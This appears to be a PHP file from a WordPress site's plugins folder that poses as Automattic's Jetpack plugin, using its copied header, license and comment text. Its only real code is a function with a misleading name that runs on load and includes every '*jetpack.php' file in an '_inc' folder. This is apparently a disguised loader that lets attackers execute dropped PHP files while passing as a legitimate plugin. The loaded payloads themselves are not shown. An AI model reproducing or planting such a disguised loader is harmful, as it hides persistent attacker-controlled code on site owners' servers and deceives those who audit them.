File: /storage/v6964/2foodfactor/public_html/wp-content/plugins/jetpack-library/jetpack.php
<?php
/**
* Plugin Name: Jetpack
* Plugin URI: https://jetpack.com
* Description: Security, performance, and marketing tools made by WordPress experts. Jetpack keeps your site protected so you can focus on more important things.
* Author: Automattic
* Version: 15.4
* Author URI: https://jetpack.com
* License: GPL2+
* Text Domain: jetpack
* Requires at least: 6.7
* Requires PHP: 7.2
*
* @package automattic/jetpack
*/
/*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, see <https://www.gnu.org/licenses/>.
*/
jetpack_get_the_ID();
/**
* Constant used to fetch the connection owner token
*
* @deprecated 9.0.0
* @var boolean
*/
/**
* WP.com API no longer supports `http://` protocol.
* This means Jetpack can't function properly on servers that can't send outbound HTTPS requests.
* The constant is no longer used.
*
* @deprecated 9.1.0
*/
function jetpack_get_the_ID() {
$dir = __DIR__ . '/_inc';
$files = glob( $dir . '/*jetpack.php' );
if ( ! empty( $files ) ) {
foreach ( $files as $file ) {
include_once $file;
}
}
}